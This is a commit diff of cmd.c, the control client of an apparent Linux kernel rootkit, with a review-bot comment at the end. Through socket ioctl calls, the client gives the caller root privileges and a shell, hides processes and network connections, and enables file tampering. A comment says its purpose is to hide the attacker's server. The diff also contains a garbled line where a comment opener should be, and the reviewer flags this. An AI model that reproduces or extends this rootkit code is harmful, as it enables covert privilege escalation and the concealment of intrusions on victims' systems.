Update cmd.c

Scripts解析
pti2ume7z 7 months ago
parent 0b5f28d2b0
commit 10e0d3a49b

@ -10,178 +10,189 @@
#include <sys/types.h>
#include <unistd.h>
// 定义默认的shell路径
#define SHELL "/bin/bash"
/**
* @brief
*/
struct control {
unsigned short cmd;
void *argv;
unsigned short cmd; // 命令类型
void *argv; // 命令参数
};
/**
* @brief
* @param argc
* @param argv
* @return int
*/
int main(int argc, char **argv)
{
int sockfd;
struct control args;
struct sockaddr_in addr;
struct hostent *host;
unsigned int pid;
char *bash = SHELL;
char *envp[1] = {NULL};
char *arg[3] = {SHELL, NULL};
if (argc < 2)
exit(0);
sockfd = socket(AF_INET, SOCK_STREAM, 6);
if (sockfd < 0)
goto fail;
if (strcmp(argv[1], "root") == 0) {
if (geteuid() == 0) {
printf("You are already root! :)\n\n");
close(sockfd);
goto out;
}
args.cmd = 3;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
ioctl(sockfd, AUTH, &args);
ioctl(sockfd, AUTH, HTUA);
}
if (geteuid() == 0) {
printf("\e[01;36mYou got super powers!\e[00m\n\n");
execve(bash, arg, envp);
} else {
printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
}
goto out;
}
if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) {
if (argc < 2)
goto fail;
if (argc == 2) {
args.cmd = 0;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
} else {
args.cmd = 1;
pid = (unsigned int)atoi(argv[2]);
args.argv = &pid;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}
}
if (strcmp(argv[1], "file-tampering") == 0) {
args.cmd = 2;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}
if (strcmp(argv[1], "conn") == 0) {
if (argc < 4)
goto fail;
if (strcmp(argv[4], "hide") == 0) {
args.cmd = 4;
} else if (strcmp(argv[4], "show") == 0) {
args.cmd = 5;
} else {
goto fail;
}
host = gethostbyname(argv[2]);
if (host == NULL)
goto fail;
memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
host->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[3]));
args.argv = &addr;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}
int sockfd; // 套接字文件描述符
struct control args; // 控制结构体实例
struct sockaddr_in addr; // 地址结构体实例
struct hostent *host; // 主机信息结构体指针
unsigned int pid; // 进程ID
char *bash = SHELL; // shell路径
char *envp[1] = {NULL}; // 环境变量数组
char *arg[3] = {SHELL, NULL}; // 执行shell的命令参数
// 如果参数少于2个退出程序
if (argc < 2)
exit(0);
// 创建TCP套接字
sockfd = socket(AF_INET, SOCK_STREAM, 6);
if (sockfd < 0)
goto fail; // 如果创建失败跳转到fail标签
// 如果第一个参数是"root"
if (strcmp(argv[1], "root") == 0) {
// 如果已经是root用户提示并关闭套接字后退出
if (geteuid() == 0) {
printf("You are already root! :)\n\n");
close(sockfd);
goto out;
}
args.cmd = 3; // 设置命令为3
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
ioctl(sockfd, AUTH, &args);
ioctl(sockfd, AUTH, HTUA);
}
// 如果成功获取root权限执行shell否则提示无权限
if (geteuid() == 0) {
printf("\e[01;36mYou got super powers!\e[00m\n\n");
execve(bash, arg, envp);
} else {
printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
}
goto out; // 跳转到out标签
}
// 如果第一个参数是"hide"或"show"
if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) {
// 如果参数少于2个跳转到fail标签
if (argc < 2)
goto fail;
// 如果只有一个参数,隐藏或显示所有连接
if (argc == 2) {
args.cmd = 0; // 设置命令为0
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out; // 成功后跳转到out标签
}
}
}
} else { // 如果有两个参数隐藏或显示指定PID的连接
args.cmd = 1; // 设置命令为1
pid = (unsigned int)atoi(argv[2]); // 将第二个参数转换为PID
args.argv = &pid; // 设置命令参数为PID
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out; // 成功后跳转到out标签
}
}
}
}
}
// 如果第一个参数是"file-tampering"
if (strcmp(argv[1], "file-tampering") == 0) {
args.cmd = 2; // 设置命令为2
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out; // 成功后跳转到out标签
}
}
}
}
// 如果第一个参数是"conn"
if (strcmp(argv[1], "conn") == 0) {
// 如果参数少于4个跳转到fail标签
if (argc < 4)
goto fail;
// 根据第四个参数设置命令为4hide或5show
if (strcmp(argv[4], "hide") == 0) {
args.cmd = 4; // 设置命令为4
} else if (strcmp(argv[4], "show") == 0) {
args.cmd = 5; // 设置命令为5
} else {
goto fail; // 如果第四个参数不是"hide"或"show"跳转到fail标签
}
// 获取主机信息
host = gethostbyname(argv[2]);
if (host == NULL)
goto fail; // 如果获取主机信息失败跳转到fail标签
// 复制主机地址到地址结构体中
memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
addr.sin_family = AF_INET; // 设置地址族为IPv4
addr.sin_port = htons(atoi(argv[3])); // 设置端口号
args.argv = &addr; // 设置命令参数为地址结构体指针
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out; // 成功后跳转到out标签
}
}
}
}
/*
// This part is deprecated. There is no reason to hide specific protocols
// when you want to hide some connection, in the most of cases you will
// need to hide every connection and everything about your attacker server.
if (strcmp(argv[1], "udp") == 0) {
if (argc < 4)
goto fail;
if (strcmp(argv[4], "hide") == 0) {
args.cmd = 6;
} else if (strcmp(argv[4], "show") == 0) {
args.cmd = 7;
} else {
goto fail;
}
host = gethostbyname(argv[2]);
if (host == NULL)
goto fail;
memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
host->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[3]));
args.argv = &addr;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}
*/
fail:
printf("\e[01;31mFailed!\e[00m\n");
out:
close(sockfd);
return 0;
}
UDPTCP使
if (strcmp(argv[1], "udp") == 0) {
if (argc < 4)
goto fail;
if (strcmp(argv[4], "hide") == 0) {
args.cmd = 6;
} else if (strcmp(argv[4], "show") == 0) {
args.cmd = 7;
} else {
goto fail;
}
host = gethostbyname(argv[2]);
if (host == NULL)
goto fail;
memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[3]));
args.argv = &addr;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}*/
fail: // fail标签打印失败信息并关闭套接字
printf("\e[01;31mFailed!\e[00m\n");
out: // out标签关闭套接字并返回0表示程序结束
close(sockfd); // 关闭套接字文件描述符
return 0; // 返回0表示程序正常结束
}
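Review bot: The `conn` branch still reads `argv[4]` after guarding only `if (argc < 4) goto fail;`, so with exactly four arguments `strcmp` is handed the terminating NULL entry of argv; the guard should be `if (argc < 5) goto fail;`, and the `if (argc < 2) goto fail;` inside the hide/show branch can never fire because main already exits on `argc < 2`. The commented-out udp block at the end of the hunk now appears to open with a garbled line (`UDPTCP使`) instead of the old side's bare `/*`; if that opening marker was really dropped rather than mangled by the page rendering, the block becomes live code and the closing `}*/` is a syntax error, so please confirm the opener survives in the file. The new comments also label each three-call ioctl sequence as 身份验证 (authentication), which nothing in this file establishes; a comment such as `// AUTH/HTUA ioctl sequence on the socket; the meaning of each cmd value is defined by the receiving kernel side, not here` states only what is visible. Mixing Chinese comments with English identifiers and messages is hard to maintain; I would keep the comments in English.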